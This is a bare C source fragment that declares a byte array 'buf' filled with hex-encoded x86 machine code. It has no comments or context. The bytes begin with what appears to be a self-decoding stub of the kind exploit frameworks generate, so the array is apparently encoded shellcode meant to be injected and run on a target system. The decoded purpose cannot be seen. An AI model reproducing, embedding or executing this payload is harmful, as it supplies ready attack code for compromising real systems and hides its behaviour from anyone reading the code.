unsigned char buf[] = 
"\xb8\xb5\x14\xaa\x34\xda\xd8\xd9\x74\x24\xf4\x5b\x33\xc9"
"\xb1\x25\x31\x43\x15\x03\x43\x15\x83\xeb\xfc\xe2\x40\x72"
"\x12\x30\xaa\x7b\x62\x5f\x11\x7a\x62\x9f\x65\x1b\xdb\xeb"
"\x65\xe3\x1b\x72\xdf\xf4\x1b\x7a\x1f\x36\x9b\x1c\xa7\xcb"
"\x9c\xe0\xd7\xad\x27\xe2\xd7\x31\x58\x85\x6e\xa5\x58\x49"
"\x90\xa0\xe2\x4c\x90\x2c\x13\x82\x10\x8c\x87\x1c\x2a\xcb"
"\x2c\x1c\x3f\xfb\x54\xa5\xbb\xfb\x98\xd5\xa5\x40\x99\xd5"
"\x29\xb7\xfc\x6c\xa7\xb7\x00\x8f\xd1\x0d\x05\x8f\x1d\x72"
"\xcb\x0f\x7b\xca\xd2\x0f\x83\x2a\xb3\xb4\x83\x2a\x3b\xcb"
"\x4e\xaa\x5d\x73\x51\xab\xa1\x83\x37\x10\xa0\x83\xb7\x66"
"\x6e\x03\xb7\x36\x1c\x61\xd6\xc5\xb9\x49\x7d\x44\x36\xef"
"\x0f\xb8\xd7\xcf\x81\xcd\x7a\x72\x38\x5c\xbf\x52\xf6\x92"
"\xbd\xa3\xc5\xe1\xf6\xc7";
